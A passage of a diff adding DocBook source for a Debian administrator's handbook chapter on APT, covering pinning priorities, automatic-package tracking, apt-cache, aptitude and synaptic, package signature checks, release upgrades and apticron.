+				Let's take the example of another package whose version 2 has been installed from <emphasis role="distribution">Testing</emphasis>. Version 1 is available in <emphasis role="distribution">Stable</emphasis> and version 3 in <emphasis role="distribution">Unstable</emphasis>. Version 1 (of priority 990 — thus lower than 1000) is discarded because it is lower than the installed version. This only leaves version 2 and 3, both of priority 500. Faced with this alternative, APT selects the newest version, the one from <emphasis role="distribution">Unstable</emphasis>.If you don't want a package installed from <emphasis role="distribution">Testing</emphasis> to migrate to <emphasis role="distribution">Unstable</emphasis>, you have to assign a priority lower than 500 (490 for example) to packages coming from <emphasis role="distribution">Unstable</emphasis>. You can modify <filename>/etc/apt/preferences</filename> to this effect:
+			</para>
+			 
+<programlisting>Package: *
+Pin: release a=unstable
+Pin-Priority: 490
+</programlisting>
+
+		</section>
+		 <section id="sect.automatic-tracking">
+			<title>Tracking Automatically Installed Packages</title>
+			 <para>
+				One of the essential functionalities of <command>apt</command> is the tracking of packages installed only through dependencies. These packages are called “automatic”, and often include libraries for instance.
+			</para>
+			 <para>
+				With this information, when packages are removed, the package managers can compute a list of automatic packages that are no longer needed (because there is no “manually installed” packages depending on them). <command>apt-get autoremove</command> or <command>apt autoremove</command> will get rid of those packages. <command>aptitude</command> does not have this command because it removes them automatically as soon as they are identified. In all cases, the tools display a clear message listing the affected packages.
+			</para>
+			 <indexterm>
+				<primary><command>apt-mark auto</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>apt-mark manual</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude markauto</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>aptitude unmarkauto</command></primary>
+			</indexterm>
+			 <para>
+				It is a good habit to mark as automatic any package that you don't need directly so that they are automatically removed when they aren't necessary anymore. <command>apt-mark auto <replaceable>package</replaceable></command> will mark the given package as automatic whereas <command>apt-mark manual <replaceable>package</replaceable></command> does the opposite. <command>aptitude markauto</command> and <command>aptitude unmarkauto</command> work in the same way although they offer more features for marking many packages at once (see <xref linkend="sect.aptitude" />). The console-based interactive interface of <command>aptitude</command> also makes it easy to review the “automatic flag” on many packages.
+			</para>
+			 <indexterm>
+				<primary><command>aptitude why</command></primary>
+			</indexterm>
+			 <para>
+				People might want to know why an automatically installed package is present on the system. To get this information from the command line, you can use <command>aptitude why <replaceable>package</replaceable></command> (<command>apt</command> and <command>apt-get</command> have no similar feature):
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>aptitude why python-debian
+</userinput><computeroutput>i   aptitude         Recommends apt-xapian-index         
+i A apt-xapian-index Depends    python-debian (&gt;= 0.1.15)
+</computeroutput></screen>
+			 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> <command>deborphan</command> and <command>debfoster</command></title>
+			 <indexterm>
+				<primary><command>deborphan</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>debfoster</command></primary>
+			</indexterm>
+			 <para>
+				In days where <command>apt</command>, <command>apt-get</command> and <command>aptitude</command> were not able to track automatic packages, there were two utilities producing lists of unnecessary packages: <command>deborphan</command> and <command>debfoster</command>.
+			</para>
+			 <para>
+				<command>deborphan</command> is the most rudimentary of both. It simply scans the <literal>libs</literal> and <literal>oldlibs</literal> sections (in the absence of supplementary instructions) looking for the packages that are currently installed and that no other package depends on. The resulting list can then serve as a basis to remove unneeded packages.
+			</para>
+			 <para>
+				<command>debfoster</command> has a more elaborate approach, very similar to APT's one: it maintains a list of packages that have been explicitly installed, and remembers what packages are really required between each invocation. If new packages appear on the system and if <command>debfoster</command> doesn't know them as required packages, they will be shown on the screen together with a list of their dependencies. The program then offers a choice: remove the package (possibly together with those that depend on it), mark it as explicitly required, or ignore it temporarily.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.apt-cache">
+		<title>The <command>apt-cache</command> Command</title>
+		 <indexterm>
+			<primary><command>apt-cache</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>APT</primary>
+			<secondary>package search</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>APT</primary>
+			<secondary>header display</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>search of packages</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>search</secondary>
+		</indexterm>
+		 <para>
+			The <command>apt-cache</command> command can display much of the information stored in APT's internal database. This information is a sort of cache since it is gathered from the different sources listed in the <filename>sources.list</filename> file. This happens during the <command>apt update</command> operation.
+		</para>
+		 <sidebar id="sidebar.cache"> <title><emphasis>VOCABULARY</emphasis> Cache</title>
+		 <para>
+			A cache is a temporary storage system used to speed up frequent data access when the usual access method is expensive (performance-wise). This concept can be applied in numerous situations and at different scales, from the core of microprocessors up to high-end storage systems.
+		</para>
+		 <para>
+			In the case of APT, the reference <filename>Packages</filename> files are those located on Debian mirrors. That said, it would be very ineffective to go through the network for every search that we might want to do in the database of available packages. That is why APT stores a copy of those files (in <filename>/var/lib/apt/lists/</filename>) and searches are done within those local files. Similarly, <filename>/var/cache/apt/archives/</filename> contains a cache of already downloaded packages to avoid downloading them again if you need to reinstall them after a removal.
+		</para>
+		 </sidebar> <indexterm>
+			<primary><command>apt show</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt search</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt-cache show</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt-cache search</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>aptitude show</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>aptitude search</command></primary>
+		</indexterm>
+		 <para>
+			The <command>apt-cache</command> command can do keyword-based package searches with <command>apt-cache search <replaceable>keyword</replaceable></command>. It can also display the headers of the package's available versions with <command>apt-cache show <replaceable>package</replaceable></command>. This command provides the package's description, its dependencies, the name of its maintainer, etc. Note that <command>apt search</command>, <command>apt show</command>, <command>aptitude search</command>, <command>aptitude show</command> work in the same way.
+		</para>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> <command>axi-cache</command></title>
+		 <indexterm>
+			<primary><command>axi-cache</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">apt-xapian-index</emphasis></primary>
+		</indexterm>
+		 <para>
+			<command>apt-cache search</command> is a very rudimentary tool, basically implementing <command>grep</command> on package's descriptions. It often returns too many results or none at all when you include too many keywords.
+		</para>
+		 <para>
+			<command>axi-cache search <replaceable>term</replaceable></command>, on the other hand, provides better results, sorted by relevancy. It uses the <emphasis>Xapian</emphasis> search engine and is part of the <emphasis role="pkg">apt-xapian-index</emphasis> package whichs indexes all package information (and more, like the <filename>.desktop</filename> files from all Debian packages). It knows about tags (see sidebar <xref linkend="sidebar.debtags" />) and returns results in a matter of milliseconds.
+		</para>
+		 
+<screen>$ <userinput>axi-cache search package use::searching</userinput>
+100 results found.
+Results 1-20:
+100% packagesearch - GUI for searching packages and viewing package information
+100% apt-utils - package management related utility programs
+99% dpkg-awk - Gawk script to parse /var/lib/dpkg/{status,available} and Packages
+98% migemo - Transitional package for migemo
+95% apt-file - search for files within Debian packages (command-line interface)
+[...]
+79% apt-xapian-index - maintenance and search tools for a Xapian index of Debian packages
+More terms: paquets debian pour debtags recherche gift gnuift
+More tags: suite::debian works-with::software:package role::program admin::package-management interface::commandline scope::utility field::biology:bioinformatics
+`axi-cache more' will give more results
+</screen>
+		 </sidebar> <indexterm>
+			<primary><command>apt-cache policy</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt-cache dumpavail</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>apt-cache pkgnames</command></primary>
+		</indexterm>
+		 <para>
+			Some features are more rarely used. For instance, <command>apt-cache policy</command> displays the priorities of package sources as well as those of individual packages. Another example is <command>apt-cache dumpavail</command> which displays the headers of all available versions of all packages. <command>apt-cache pkgnames</command> displays the list of all the packages which appear at least once in the cache.
+		</para>
+
+	</section>
+	 <section id="sect.apt-frontends">
+		<title>Frontends: <command>aptitude</command>, <command>synaptic</command></title>
+		 <indexterm>
+			<primary><command>aptitude</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>synaptic</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>APT</primary>
+			<secondary>interfaces</secondary>
+		</indexterm>
+		 <para>
+			APT is a C++ program whose code mainly resides in the <command>libapt-pkg</command> shared library. Using a shared library facilitates the creation of user interfaces (front-ends), since the code contained in the library can easily be reused. Historically, <command>apt-get</command> was only designed as a test front-end for <command>libapt-pkg</command> but its success tends to obscure this fact.
+		</para>
+		 <section id="sect.aptitude">
+			<title><command>aptitude</command></title>
+			 <para>
+				<command>aptitude</command> is an interactive program that can be used in semi-graphical mode on the console. You can browse the list of installed and available packages, look up all the available information, and select packages to install or remove. The program is designed specifically to be used by administrators, so that its default behaviors are much more intelligent than <command>apt-get</command>'s, and its interface much easier to understand.
+			</para>
+			 <figure>
+				<title>The <command>aptitude</command> package manager</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/aptitude.png" format="PNG" scalefit="1" width="75%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				When it starts, <command>aptitude</command> shows a list of packages sorted by state (installed, non-installed, or installed but not available on the mirrors — other sections display tasks, virtual packages, and new packages that appeared recently on mirrors). To facilitate thematic browsing, other views are available. In all cases, <command>aptitude</command> displays a list combining categories and packages on the screen. Categories are organized through a tree structure, whose branches can respectively be unfolded or closed with the <keycombo><keycap>Enter</keycap></keycombo>, <keycombo><keycap>[</keycap></keycombo> and <keycombo><keycap>]</keycap></keycombo> keys. <keycombo><keycap>+</keycap></keycombo> should be used to mark a package for installation, <keycombo><keycap>-</keycap></keycombo> to mark it for removal and <keycombo><keycap>_</keycap></keycombo> to purge it (note that these keys can also be used for categories, in which case the corresponding actions will be applied to all the packages of the category). <keycombo><keycap>u</keycap></keycombo> updates the lists of available packages and <keycombo action="simul"><keycap>Shift</keycap><keycap>u</keycap></keycombo> prepares a global system upgrade. <keycombo><keycap>g</keycap></keycombo> switches to a summary view of the requested changes (and typing <keycombo><keycap>g</keycap></keycombo> again will apply the changes), and <keycombo><keycap>q</keycap></keycombo> quits the current view. If you are in the initial view, this will effectively close <command>aptitude</command>.
+			</para>
+			 <sidebar> <title><emphasis>DOCUMENTATION</emphasis> <command>aptitude</command></title>
+			 <para>
+				This section does not cover the finer details of using <command>aptitude</command>, it rather focuses on giving you a survival kit to use it. <command>aptitude</command> is rather well documented and we advise you to use its complete manual available in the <emphasis role="pkg">aptitude-doc-en</emphasis> package (see <filename>/usr/share/doc/aptitude/html/en/index.html</filename>).
+			</para>
+			 </sidebar> <para>
+				To search for a package, you can type <keycombo><keycap>/</keycap></keycombo> followed by a search pattern. This pattern matches the name of the package, but can also be applied to the description (if preceded by <literal>~d</literal>), to the section (with <literal>~s</literal>) or to other characteristics detailed in the documentation. The same patterns can filter the list of displayed packages: type the <keycombo><keycap>l</keycap></keycombo> key (as in <foreignphrase>limit</foreignphrase>) and enter the pattern.
+			</para>
+			 <para>
+				Managing the “automatic flag” of Debian packages (see <xref linkend="sect.automatic-tracking" />) is a breeze with <command>aptitude</command>. It is possible to browse the list of installed packages and mark packages as automatic with <keycombo action="simul"><keycap>Shift</keycap> <keycap>m</keycap></keycombo> or to remove the mark with the <keycombo><keycap>m</keycap></keycombo> key. “Automatic packages” are displayed with an “A” in the list of packages. This feature also offers a simple way to visualize the packages in use on a machine, without all the libraries and dependencies that you don't really care about. The related pattern that can be used with <keycombo><keycap>l</keycap></keycombo> (to activate the filter mode) is <literal>~i!~M</literal>. It specifies that you only want to see installed packages (<literal>~i</literal>) not marked as automatic (<literal>!~M</literal>).
+			</para>
+			 <sidebar> <title><emphasis>TOOL</emphasis> Using <command>aptitude</command> on the command-line interface</title>
+			 <para>
+				Most of <command>aptitude</command>'s features are accessible via the interactive interface as well as via command-lines. These command-lines will seem familiar to regular users of <command>apt-get</command> and <command>apt-cache</command>.
+			</para>
+			 <para>
+				The advanced features of <command>aptitude</command> are also available on the command-line. You can use the same package search patterns as in the interactive version. For example, if you want to cleanup the list of “manually installed” packages, and if you know that none of the locally installed programs require any particular libraries or Perl modules, you can mark the corresponding packages as automatic with a single command:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>aptitude markauto '~slibs|~sperl'</userinput></screen>
+			 <para>
+				Here, you can clearly see the power of the search pattern system of <command>aptitude</command>, which enables the instant selection of all the packages in the <literal>libs</literal> and <literal>perl</literal> sections.
+			</para>
+			 <para>
+				Beware, if some packages are marked as automatic and if no other package depends on them, they will be removed immediately (after a confirmation request).
+			</para>
+			 </sidebar> <section>
+				<title>Managing Recommendations, Suggestions and Tasks</title>
+				 <para>
+					Another interesting feature of <command>aptitude</command> is the fact that it respects recommendations between packages while still giving users the choice not to install them on a case by case basis. For example, the <emphasis role="pkg">gnome</emphasis> package recommends <emphasis role="pkg">brasero</emphasis> (among others). When you select the former for installation, the latter will also be selected (and marked as automatic if not already installed on the system). Typing <keycombo><keycap>g</keycap></keycombo> will make it obvious: <emphasis role="pkg">brasero</emphasis> appears on the summary screen of pending actions in the list of packages installed automatically to satisfy dependencies. However, you can decide not to install it by deselecting it before confirming the operations.
+				</para>
+				 <para>
+					Note that this recommendation tracking feature does not apply to upgrades. For instance, if a new version of <emphasis role="pkg">gnome</emphasis> recommends a package that it did not recommend formerly, the package won't be marked for installation. However, it will be listed on the upgrade screen so that the administrator can still select it for installation.
+				</para>
+				 <para>
+					Suggestions between packages are also taken into account, but in a manner adapted to their specific status. For example, since <emphasis role="pkg">gnome</emphasis> suggests <emphasis role="pkg">empathy</emphasis>, the latter will be displayed on the summary screen of pending actions (in the section of packages suggested by other packages). This way, it is visible and the administrator can decide whether to take the suggestion into account or not. Since it is only a suggestion and not a dependency or a recommendation, the package will not be selected automatically — its selection requires a manual intervention from the user (thus, the package will not be marked as automatic).
+				</para>
+				 <para>
+					In the same spirit, remember that <command>aptitude</command> makes intelligent use of the concept of task. Since tasks are displayed as categories in the screens of packages lists, you can either select a full task for installation or removal, or browse the list of packages included in the task to select a smaller subset.
+				</para>
+
+			</section>
+			 <section>
+				<title>Better Solver Algorithms</title>
+				 <para>
+					To conclude this section, let's note that <command>aptitude</command> has more elaborate algorithms compared to <command>apt-get</command> when it comes to resolving difficult situations. When a set of actions is requested and when these combined actions would lead to an incoherent system, <command>aptitude</command> evaluates several possible scenarios and presents them in order of decreasing relevance. However, these algorithms are not failproof. Fortunately there is always the possibility to manually select the actions to perform. When the currently selected actions lead to contradictions, the upper part of the screen indicates a number of “broken” packages (and you can directly navigate to those packages by pressing <keycombo><keycap>b</keycap></keycombo>). It is then possible to manually build a solution for the problems found. In particular, you can get access to the different available versions by simply selecting the package with <keycombo><keycap>Enter</keycap></keycombo>. If the selection of one of these versions solves the problem, you should not hesitate to use the function. When the number of broken packages gets down to zero, you can safely go to the summary screen of pending actions for a last check before you apply them.
+				</para>
+				 <sidebar> <title><emphasis>NOTE</emphasis> <command>aptitude</command>'s log</title>
+				 <para>
+					Like <command>dpkg</command>, <command>aptitude</command> keeps a trace of executed actions in its logfile (<filename>/var/log/aptitude</filename>). However, since both commands work at a very different level, you cannot find the same information in their respective logfiles. While <command>dpkg</command> logs all the operations executed on individual packages step by step, <command>aptitude</command> gives a broader view of high-level operations like a system-wide upgrade.
+				</para>
+				 <para>
+					Beware, this logfile only contains a summary of operations performed by <command>aptitude</command>. If other front-ends (or even <command>dpkg</command> itself) are occasionally used, then <command>aptitude</command>'s log will only contain a partial view of the operations, so you can't rely on it to build a trustworthy history of the system.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section>
+			<title><command>synaptic</command></title>
+			 <para>
+				<command>synaptic</command> is a graphical package manager for Debian which features a clean and efficient graphical interface based on GTK+/GNOME. Its many ready-to-use filters give fast access to newly available packages, installed packages, upgradable packages, obsolete packages and so on. If you browse through these lists, you can select the operations to be done on the packages (install, upgrade, remove, purge); these operations are not performed immediately, but put into a task list. A single click on a button then validates the operations, and they are performed in one go.
+			</para>
+			 <figure>
+				<title><command>synaptic</command> package manager</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/synaptic.png" format="PNG" scalefit="1" width="75%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+
+	</section>
+	 <section id="sect.package-authentication">
+		<title>Checking Package Authenticity</title>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>authenticity check</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>seal</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>signature</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>signature</primary>
+			<secondary>package signature</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary>authentication</primary>
+			<secondary>package authentication</secondary>
+		</indexterm>
+		 <para>
+			Security is very important for Falcot Corp administrators. Accordingly, they need to ensure that they only install packages which are guaranteed to come from Debian with no tampering on the way. A computer cracker could try to add malicious code to an otherwise legitimate package. Such a package, if installed, could do anything the cracker designed it to do, including for instance disclosing passwords or confidential information. To circumvent this risk, Debian provides a tamper-proof seal to guarantee — at install time — that a package really comes from its official maintainer and hasn't been modified by a third party.
+		</para>
+		 <para>
+			The seal works with a chain of cryptographical hashes and a signature. The signed file is the <filename>Release</filename> file, provided by the Debian mirrors. It contains a list of the <filename>Packages</filename> files (including their compressed forms, <filename>Packages.gz</filename> and <filename>Packages.xz</filename>, and the incremental versions), along with their MD5, SHA1 and SHA256 hashes, which ensures that the files haven't been tampered with. These <filename>Packages</filename> files contain a list of the Debian packages available on the mirror, along with their hashes, which ensures in turn that the contents of the packages themselves haven't been altered either.
+		</para>
+		 <indexterm>
+			<primary><command>apt-key</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="pkg">debian-archive-keyring</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>/etc/apt/trusted.gpg.d/</filename></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><filename>Release.gpg</filename></primary>
+		</indexterm>
+		 <para>
+			APT needs a set of trusted GnuPG public keys to verify signatures in the <filename>Release.gpg</filename> files available on the mirrors. It gets them from files in <filename>/etc/apt/trusted.gpg.d/</filename> and from the <filename>/etc/apt/trusted.gpg</filename> keyring (managed by the <command>apt-key</command> command). The official Debian keys are provided and kept up-to-date by the <emphasis role="pkg">debian-archive-keyring</emphasis> package which puts them in <filename>/etc/apt/trusted.gpg.d/</filename>. Note however that the first installation of this particular package requires caution: even if the package is signed like any other, the signature cannot be verified externally. Cautious administrators should therefore check the fingerprints of imported keys before trusting them to install new packages:
+		</para>
+		 
+<screen role="scale"># <userinput>apt-key fingerprint</userinput>
+/etc/apt/trusted.gpg.d/debian-archive-jessie-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      126C 0D24 BD8A 2942 CC7D  F8AC 7638 D044 2B90 D010
+uid           [ unknown] Debian Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-security-automatic.gpg
+-------------------------------------------------------------------
+pub   rsa4096 2014-11-21 [SC] [expires: 2022-11-19]
+      D211 6914 1CEC D440 F2EB  8DDA 9D6D 8F6B C857 C906
+uid           [ unknown] Debian Security Archive Automatic Signing Key (8/jessie) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-jessie-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2013-08-17 [SC] [expires: 2021-08-15]
+      75DD C3C4 A499 F1A1 8CB5  F3C8 CBF8 D6FD 518E 17E1
+uid           [ unknown] Jessie Stable Release Key &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
+-----------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      E1CF 20DD FFE4 B89E 8026  58F1 E0B1 1894 F66A EC98
+uid           [ unknown] Debian Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
+--------------------------------------------------------------------
+pub   rsa4096 2017-05-22 [SC] [expires: 2025-05-20]
+      6ED6 F5CB 5FA6 FB2F 460A  E88E EDA0 D238 8AE2 2BA9
+uid           [ unknown] Debian Security Archive Automatic Signing Key (9/stretch) &lt;ftpmaster@debian.org&gt;
+sub   rsa4096 2017-05-22 [S] [expires: 2025-05-20]
+
+/etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
+--------------------------------------------------------
+pub   rsa4096 2017-05-20 [SC] [expires: 2025-05-18]
+      067E 3C45 6BAE 240A CEE8  8F6F EF0F 382A 1A7B 6500
+uid           [ unknown] Debian Stable Release Key (9/stretch) &lt;debian-release@lists.debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-automatic.gpg
+----------------------------------------------------------
+pub   rsa4096 2012-04-27 [SC] [expires: 2020-04-25]
+      A1BD 8E9D 78F7 FE5C 3E65  D8AF 8B48 AD62 4692 5553
+uid           [ unknown] Debian Archive Automatic Signing Key (7.0/wheezy) &lt;ftpmaster@debian.org&gt;
+
+/etc/apt/trusted.gpg.d/debian-archive-wheezy-stable.gpg
+-------------------------------------------------------
+pub   rsa4096 2012-05-08 [SC] [expires: 2019-05-07]
+      ED6D 6527 1AAC F0FF 15D1  2303 6FB2 A1C2 65FF B764
+uid           [ unknown] Wheezy Stable Release Key &lt;debian-release@lists.debian.org&gt;
+</screen>
+		 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Adding trusted keys</title>
+		 <indexterm>
+			<primary>trusted key</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>key</primary>
+			<secondary>APT's authentication keys</secondary>
+		</indexterm>
+		 <para>
+			When a third-party package source is added to the <filename>sources.list</filename> file, APT needs to be told to trust the corresponding GPG authentication key (otherwise it will keep complaining that it can't ensure the authenticity of the packages coming from that repository). The first step is of course to get the public key. More often than not, the key will be provided as a small text file, which we will call <filename>key.asc</filename> in the following examples.
+		</para>
+		 <para>
+			To add the key to the trusted keyring, the administrator can just put it in a <filename>*.asc</filename> file in <filename>/etc/apt/trusted.gpg.d/</filename>. This is supported since Debian <emphasis role="distribution">Stretch</emphasis>. With older releases, you had to run <command>apt-key add &lt; key.asc</command>.
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">gui-apt-key</emphasis></primary>
+		</indexterm>
+		 <para>
+			For people who would want a dedicated application and more details on the trusted keys, it is possible to use <command>gui-apt-key</command> (in the package of the same name), a small graphical user interface which manages the trusted keyring.
+		</para>
+		 </sidebar> <para>
+			Once the appropriate keys are in the keyring, APT will check the signatures before any risky operation, so that front-ends will display a warning if asked to install a package whose authenticity can't be ascertained.
+		</para>
+
+	</section>
+	 <section id="sect.dist-upgrade">
+		<title>Upgrading from One Stable Distribution to the Next</title>
+		 <para>
+			One of the best-known features of Debian is its ability to upgrade an installed system from one stable release to the next: <foreignphrase>dist-upgrade</foreignphrase> — a well-known phrase — has largely contributed to the project's reputation. With a few precautions, upgrading a computer can take as little as a few minutes, or a few dozen minutes, depending on the download speed from the package repositories.
+		</para>
+		 <section>
+			<title>Recommended Procedure</title>
+			 <para>
+				Since Debian has quite some time to evolve in-between stable releases, you should read the release notes before upgrading.
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Release notes</title>
+			 <para>
+				The release notes for an operating system (and, more generally, for any software) are a document giving an overview of the software, with some details concerning the particularities of one version. These documents are generally short compared to the complete documentation, and they usually list the features which have been introduced since the previous version. They also give details on upgrading procedures, warnings for users of previous versions, and sometimes errata.
+			</para>
+			 <para>
+				Release notes are available online: the release notes for the current stable release have a dedicated URL, while older release notes can be found with their codenames: <ulink type="block" url="http://www.debian.org/releases/stable/releasenotes" /> <ulink type="block" url="http://www.debian.org/releases/jessie/releasenotes" />
+			</para>
+			 </sidebar> <para>
+				In this section, we will focus on upgrading a <emphasis role="distribution">Jessie</emphasis> system to <emphasis role="distribution">Stretch</emphasis>. This is a major operation on a system; as such, it is never 100% risk-free, and should not be attempted before all important data has been backed up.
+			</para>
+			 <para>
+				Another good habit which makes the upgrade easier (and shorter) is to tidy your installed packages and keep only the ones that are really needed. Helpful tools to do that include <command>aptitude</command>, <command>deborphan</command> and <command>debfoster</command> (see <xref linkend="sect.automatic-tracking" />). For example, you can use the following command, and then use <command>aptitude</command>'s interactive mode to double check and fine-tune the scheduled removals:
+			</para>
+			 
+<screen># <userinput>deborphan | xargs aptitude --schedule-only remove</userinput></screen>
+			 <para>
+				Now for the upgrading itself. First, you need to change the <filename>/etc/apt/sources.list</filename> file to tell APT to get its packages from <emphasis role="distribution">Stretch</emphasis> instead of <emphasis role="distribution">Jessie</emphasis>. If the file only contains references to <emphasis role="distribution">Stable</emphasis> rather than explicit codenames, the change isn't even required, since <emphasis role="distribution">Stable</emphasis> always refers to the latest released version of Debian. In both cases, the database of available packages must be refreshed (with the <command>apt update</command> command or the refresh button in <command>synaptic</command>).
+			</para>
+			 <para>
+				Once these new package sources are registered, you should first do a minimal upgrade with <command>apt upgrade</command>. By doing the upgrade in two steps, we ease the job of the package management tools and often ensure that we have the latest versions of those, which might have accumulated bugfixes and improvements required to complete the full distribution upgrade.
+			</para>
+			 <para>
+				Once this first upgrade is done, it is time to handle the upgrade itself, either with <command>apt full-upgrade</command>, <command>aptitude</command>, or <command>synaptic</command>. You should carefully check the suggested actions before applying them: you might want to add suggested packages or deselect packages which are only recommended and known not to be useful. In any case, the front-end should come up with a scenario ending in a coherent and up-to-date <emphasis role="distribution">Stretch</emphasis> system. Then, all you need is to do is wait while the required packages are downloaded, answer the Debconf questions and possibly those about locally modified configuration files, and sit back while APT does its magic.
+			</para>
+
+		</section>
+		 <section>
+			<title>Handling Problems after an Upgrade</title>
+			 <para>
+				In spite of the Debian maintainers' best efforts, a major system upgrade isn't always as smooth as you could wish. New software versions may be incompatible with previous ones (for instance, their default behavior or their data format may have changed). Also, some bugs may slip through the cracks despite the testing phase which always precedes a Debian release.
+			</para>
+			 <para>
+				To anticipate some of these problems, you can install the <emphasis role="pkg">apt-listchanges</emphasis> package, which displays information about possible problems at the beginning of a package upgrade. This information is compiled by the package maintainers and put in <filename>/usr/share/doc/<replaceable>package</replaceable>/NEWS.Debian</filename> files for the benefit of users. Reading these files (possibly through <emphasis role="pkg">apt-listchanges</emphasis>) should help you avoid bad surprises.
+			</para>
+			 <para>
+				You might sometimes find that the new version of a software doesn't work at all. This generally happens if the application isn't particularly popular and hasn't been tested enough; a last-minute update can also introduce regressions which are only found after the stable release. In both cases, the first thing to do is to have a look at the bug tracking system at <literal>https://bugs.debian.org/<replaceable>package</replaceable></literal>, and check whether the problem has already been reported. If it hasn't, you should report it yourself with <command>reportbug</command>. If it is already known, the bug report and the associated messages are usually an excellent source of information related to the bug:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						sometimes a patch already exists, and it is available on the bug report; you can then recompile a fixed version of the broken package locally (see <xref linkend="sect.rebuilding-package" />);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						in other cases, users may have found a workaround for the problem and shared their insights about it in their replies to the report;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						in yet other cases, a fixed package may have already been prepared and made public by the maintainer.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Depending on the severity of the bug, a new version of the package may be prepared specifically for a new revision of the stable release. When this happens, the fixed package is made available in the <literal>proposed-updates</literal> section of the Debian mirrors (see <xref linkend="sect.proposed-updates" />). The corresponding entry can then be temporarily added to the <filename>sources.list</filename> file, and updated packages can be installed with <command>apt</command> or <command>aptitude</command>.
+			</para>
+			 <para>
+				Sometimes the fixed package isn't available in this section yet because it is pending a validation by the Stable Release Managers. You can verify if that's the case on their web page. Packages listed there aren't available yet, but at least you know that the publication process is ongoing. <ulink type="block" url="https://release.debian.org/proposed-updates/stable.html" />
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.regular-upgrades">
+		<title>Keeping a System Up to Date</title>
+		 <para>
+			The Debian distribution is dynamic and changes continually. Most of the changes are in the <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis> versions, but even <emphasis role="distribution">Stable</emphasis> is updated from time to time, mostly for security-related fixes. Whatever version of Debian a system runs, it is generally a good idea to keep it up to date, so that you can get the benefit of recent evolutions and bug fixes.
+		</para>
+		 <para>
+			While it is of course possible to periodically run a tool to check for available updates and run the upgrades, such a repetitive task is tedious, especially when it needs to be performed on several machines. Fortunately, like many repetitive tasks, it can be partly automated, and a set of tools have already been developed to that effect.
+		</para>
+		 <para>
+			The first of these tools is <command>apticron</command>, in the package of the same name. Its main effect is to run a script daily (via <command>cron</command>). The script updates the list of available packages, and, if some installed packages are not in the latest available version, it sends an email with a list of these packages along with the changes that have been made in the new versions. Obviously, this package mostly targets users of Debian <emphasis role="distribution">Stable</emphasis>, since the daily emails would be very long for the faster paced versions of Debian. When updates are available, <command>apticron</command> automatically downloads them. It does not install them — the administrator will still do it — but having the packages already downloaded and available locally (in APT's cache) makes the job faster.
+		</para>
+		 <para>
